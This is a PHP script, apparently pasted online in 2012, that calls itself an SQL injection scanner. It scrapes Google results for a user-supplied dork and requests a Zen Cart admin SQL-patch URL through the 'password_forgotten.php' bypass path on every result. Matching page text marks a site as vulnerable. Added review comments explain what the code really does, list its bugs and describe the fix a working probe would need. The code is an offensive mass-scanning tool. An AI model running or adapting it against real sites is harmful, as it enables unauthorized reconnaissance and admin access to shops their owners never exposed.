intifadha

[PHP] SQL Injection Scanner

Feb 7th, 2012
<?php
/**
 * SQL Injection Scanner
 * PHP Version By XShimeX
 * Version 1.0
 * Thanks To: TBDSecurity.Com, HMSecurity.org, All my friends, And ALLAH.
 *
 * NOTE(review): despite the name, nothing in this script tests for SQL
 * injection. What it actually does, in order:
 *   1. scrapes Google result pages for the dork given as the first argument;
 *   2. requests <result URL>/admin/sqlpatch.php/password_forgotten.php?action=execute
 *      from every extracted link;
 *   3. counts a "hit" whenever the response body contains one of the Zen Cart
 *      admin SQL-patch page strings listed in $bug below.
 * A hit suggests that the Zen Cart admin SQL-patch page was served without
 * authentication; it does not demonstrate any SQL injection. The trailing
 * "/password_forgotten.php" path segment appears intended to make the admin
 * login check treat the request as the password-reset page -- confirm against
 * the Zen Cart version in question before drawing conclusions from a hit.
 *
 * Sending these requests to hosts you do not own, or lack written permission
 * to test, is unauthorized scanning. Restrict use to systems you are
 * authorized to assess.
 */
set_time_limit(0);

// Tallies. All three are incremented once per (URL, pattern) pair in the loop
// below, not once per URL: with five patterns, "Total scanned Website" is five
// times the number of URLs probed, and a single URL can add up to five to $vuln.
$vuln = 0;
$not_vuln = 0;
$total = 0;

print "[+] SQL Injection Scanner PHP Version\n";
print "[+] Version 1.0 By XShimeX\n";

// Require a dork as the single argument. `!$argv[1]` raises an undefined-index
// notice when no argument is given, and also rejects the literal argument "0".
if(!$argv[1]) {
print "[%] Usage: $argv[0] <dork>\n";
print "[%] Example : $argv[0] inurl:news.php?id=\n";
exit;
}

/**
 * Signature strings, taken from: http://www.darkc0de.com/others/devilzc0de.py
 * These are text fragments of the Zen Cart admin "SQL patch" page. Each entry
 * is used below as an unescaped regex body ("/$error/" with no preg_quote()),
 * so any future entry containing "/" or PCRE metacharacters would break or
 * change the match -- the current five happen to contain neither.
 * The "β„’" in the third entry looks like a mis-encoded trademark sign; as a
 * literal pattern it only matches a response carrying the same byte sequence.
 */

$bug = array(
'If you are installing 3rd-party contributions, note that you do so at your own risk',
'BE SURE TO DO A FULL DATABASE BACKUP BEFORE RUNNING SCRIPTS HERE',
'Zen Cartβ„’ makes no warranty as to the safety of scripts supplied by 3rd-party contributors. Test before using on your live database',
'NOTE: Zen Cart database-upgrade scripts should NOT be run from this page',
'Please upload the new zc_install folder and run the upgrade from there instead for better reliability'
);

print "[@] Start Finding Links...\n";
// Fetch Google result pages start=0..900 in steps of 10 (91 requests).
// $argv[1] is interpolated into the query string without urlencode(), so a
// dork containing spaces or "&" yields a malformed URL. No User-Agent or delay
// is set and errors are suppressed with "@": on a failed fetch $fp is false,
// preg_match_all matches nothing and $links[2] is an empty array.
// The regex hard-codes one specific shape of Google's result markup
// (<h3 class=...><a href="..." class=...>); if the live markup differs, no
// links are extracted and the scan silently reports zero.
for($i = 0; $i <= 900; $i += 10) {
$fp = @file_get_contents("http://www.google.com/search?q=$argv[1]&num=10&hl=en&as_qdr=all&start=$i&sa=N");
@preg_match_all("/<h3 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $fp, $links);
$url[] = $links[2]; // capture group 2 = href; $url becomes an array of per-page arrays
}
print "[@] Done Finding Links...\n";
print "[@] Now searching for Vulnerable\n";
// $url is a list of per-page link arrays, hence the nested loops.
foreach($url as $key) {
foreach($key as $value) {
// $value is the full result URL. For a dork such as inurl:news.php?id= that is
// a page URL including its query string, so the probe path is appended to the
// page (e.g. ...news.php?id=1/admin/sqlpatch.php/...) rather than to the site
// root, which is not where a Zen Cart admin directory would live.
// NOTE(review): reducing $value to scheme + host before appending is what a
// working probe would need; the code is left unchanged here.
$fp = @file_get_contents($value."/admin/sqlpatch.php/password_forgotten.php?action=execute");
foreach($bug as $error) {
// $error is used verbatim as the regex body -- see the note on $bug above.
if(@preg_match("/$error/", $fp)) {
print "[#] zen cart error: $value'\n"; // the trailing "'" in this message is in the original output
$vuln++;
} else {
$not_vuln++;
}
$total++;
}
}
}
print "[@] Done Scanning\n";
print "[%] Result\n";
print "[-] Total Vulnerable: $vuln\n";
print "[-] Total Not Vulnerable : $not_vuln\n";
print "[-] Total scanned Website: $total\n"; // see tally note above: this counts URL x pattern pairs
print "Enjoy :)\n";

?>